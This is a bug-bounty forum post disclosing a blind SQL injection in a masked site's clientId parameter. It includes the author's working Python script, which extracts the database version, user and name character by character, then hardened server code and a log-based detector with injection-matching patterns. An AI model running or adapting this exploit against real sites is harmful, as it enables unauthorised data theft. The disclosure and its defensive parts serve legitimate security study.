High-risk SQL injection on a certain XX site

Posted by huim



RANK 24

Coins: 24

Equivalent RMB: 240

Same root cause as the previous vulnerability, so it was only rated 24.


Request:

GET /check?clientId=64915 HTTP/1.1
Host: aaa.bbb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Accept: */*
Cookie: XX
Connection: close


The clientId parameter is vulnerable to boolean-based blind injection. sqlmap could not extract any data from it, so I wrote a script to verify it.

Script

As usual, anything in the code that could reveal where the vulnerability is has been removed or masked. It is very fresh and has not been patched yet.

#! /usr/bin/env python3
# Date : 1/5 16:04
# Comment: no comment


import requests

# The URL, cookies and headers were masked by the author ("xxx");
# they must be filled in before the script can run.
raw_url = "xxx"
burp0_cookies = {}
burp0_headers = {}


def get_version():
    # Recover version() one character at a time: for position i, try every
    # printable ASCII code j until the page answers "true".
    version = ''
    for i in range(1, 20):
        for j in range(32, 127):
            burp0_url = "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(version()," + str(i) + ",1))=" + str(j)
            print(burp0_url)
            try:
                res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
            except Exception as e:
                continue
            if "true" in res.text:
                version += chr(j)
                break
        print('version:', version)


def get_user():
    # Same character-by-character oracle, this time against user().
    user = ''
    for i in range(1, 20):
        for j in range(32, 127):
            burp0_url = "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(user()," + str(i) + ",1))=" + str(j)
            print(burp0_url)
            try:
                res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
            except Exception as e:
                continue
            if "true" in res.text:
                user += chr(j)
                break
        print('user:', user)


def get_db():
    # Same oracle against database().
    current_db = ''
    for i in range(1, 20):
        for j in range(32, 127):
            burp0_url = "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(database()," + str(i) + ",1))=" + str(j)
            print(burp0_url)
            try:
                res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
            except Exception as e:
                continue
            if "true" in res.text:
                current_db += chr(j)
                break
        print('current_db:', current_db)


get_version()
get_db()
get_user()
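For contrast, here is what the /check endpoint should look like on the server side. This is an added example, not code from the original post or from the affected site; the table, the column names and the plain "true"/"false" response body are assumptions about what the endpoint does. The id is validated as a decimal integer before any SQL exists and is then bound as a parameter, so the payloads used by the script above are rejected up front and could never be parsed as SQL.

```python
"""Hardened lookup behind GET /check?clientId=<id> (added example).

Assumed: a `clients` table keyed by an integer `client_id`, and a handler
that replies "true" when the id exists and "false" otherwise.
"""
import re
import sqlite3

# Constructed in-memory table standing in for the site's real database.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE clients (client_id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO clients VALUES (?, ?)",
                 [(64915, "demo-a"), (70001, "demo-b")])
conn.commit()

# Only ASCII digits, bounded length: str.isdigit() would also accept
# Unicode digit characters that int() cannot parse.
CLIENT_ID_RE = re.compile(r"[0-9]{1,10}")


def parse_client_id(raw):
    """Return the id as an int, or None if the input is not a plain id."""
    if raw is None or not CLIENT_ID_RE.fullmatch(raw):
        return None
    return int(raw)


def check_client(raw_client_id):
    """Return (http_status, body) for GET /check?clientId=<raw_client_id>."""
    client_id = parse_client_id(raw_client_id)
    if client_id is None:
        return 400, "invalid clientId"
    # The id travels as a bound parameter: the driver sends it as a value,
    # never as statement text, so quotes, inline comments and function
    # calls in the input cannot change what the query does.
    row = conn.execute(
        "SELECT 1 FROM clients WHERE client_id = ?", (client_id,)
    ).fetchone()
    return 200, ("true" if row else "false")


if __name__ == "__main__":
    for raw in ("64915", "1",
                "54915'/**/or/**/ascii(mid(version(),1,1))=53",
                "64915 OR 1=1"):
        print(repr(raw), "->", check_client(raw))
```

Both controls matter on their own: the integer check stops the probe before the database is involved, and parameter binding keeps the query safe even for parameters that legitimately have to accept free text.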

 

sqlmap could not exploit it. This is the case where a scanner flags an injection first, sqlmap then fails to confirm it, yet the injection really does exist; writing your own script to verify it is one way to handle that.
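Whether it was sqlmap or a hand-written script, the extraction described above leaves a very recognisable trace in the web server's access log: one client sending dozens of requests to the same path and parameter, each carrying a quote, inline comments and an ascii(mid(...)) comparison, one request per candidate character. The following added example (not part of the original post) shows detection logic for that pattern. It assumes nginx/Apache "combined" format log lines; the sample lines are constructed to mimic the script's traffic plus some ordinary requests.

```python
"""Spot boolean-based blind SQL injection probing in access logs (added example).

Assumed input: combined-format access log lines. The SAMPLE_LOG below is
constructed, not captured from any real server.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Fields of the combined log format that the rules below need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Fragments that never belong in a numeric id parameter; each rule is
# applied to the URL-decoded parameter value.
SQLI_RULES = {
    "quote_then_or": re.compile(r"'(?:\s|/\*.*?\*/)*or(?:\s|/\*.*?\*/)+", re.I),
    "char_probe": re.compile(r"\b(?:ascii|ord|mid|substr(?:ing)?)\s*\(", re.I),
    "fingerprint_fn": re.compile(r"\b(?:version|database|user|current_user)\s*\(\s*\)", re.I),
    "comment_as_space": re.compile(r"/\*[\s\S]*?\*/"),
}


def parse_line(line):
    """Return ip, path, status and decoded query parameters, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes names and values, so %27 becomes a quote.
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    return {"ip": m.group("ip"), "path": parts.path,
            "status": int(m.group("status")), "params": params}


def matched_rules(value):
    """Names of the SQLI_RULES that fire on one decoded parameter value."""
    return [name for name, rx in SQLI_RULES.items() if rx.search(value)]


def analyse(lines, burst_threshold=20):
    """Aggregate injection-looking requests per (ip, path, parameter).

    One hit deserves a look; a burst of hits against the same parameter
    is the signature of character-by-character extraction.
    """
    counts = Counter()
    rules_seen = {}
    sample = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"].items():
            hits = matched_rules(value)
            if not hits:
                continue
            key = (rec["ip"], rec["path"], name)
            counts[key] += 1
            rules_seen.setdefault(key, set()).update(hits)
            sample.setdefault(key, value)
    findings = []
    for (ip, path, param), n in counts.most_common():
        findings.append({
            "ip": ip, "path": path, "param": param, "requests": n,
            "rules": sorted(rules_seen[(ip, path, param)]),
            "sample": sample[(ip, path, param)],
            "burst": n >= burst_threshold,
        })
    return findings


# Constructed sample log: 30 probes from one client walking the first
# character of version() (ASCII 32..61), plus ordinary traffic and one
# lone classic probe from another client.
SAMPLE_LOG = [
    '203.0.113.9 - - [05/Jan/2018:16:04:%02d +0800] "GET /check?clientId=54915%%27'
    '/**/or/**/ascii(mid(version(),1,1))=%d HTTP/1.1" 200 4' % (j % 60, j)
    for j in range(32, 62)
] + [
    '198.51.100.4 - - [05/Jan/2018:16:05:01 +0800] "GET /check?clientId=64915 HTTP/1.1" 200 4',
    '198.51.100.4 - - [05/Jan/2018:16:05:02 +0800] "GET /static/app.js HTTP/1.1" 200 8812',
    '192.0.2.7 - - [05/Jan/2018:16:05:03 +0800] "GET /check?clientId=1%27%20or%201=1 HTTP/1.1" 200 4',
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        flag = "BURST" if f["burst"] else "single"
        print(f"{flag:6} {f['ip']:15} {f['path']} {f['param']} "
              f"x{f['requests']} rules={','.join(f['rules'])}")
```

The per-(ip, path, parameter) count is the part worth keeping even if the token rules are tuned down: a blind extraction of a 20-character value can cost close to two thousand near-identical requests, which stands out from normal traffic regardless of how the payload is obfuscated.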
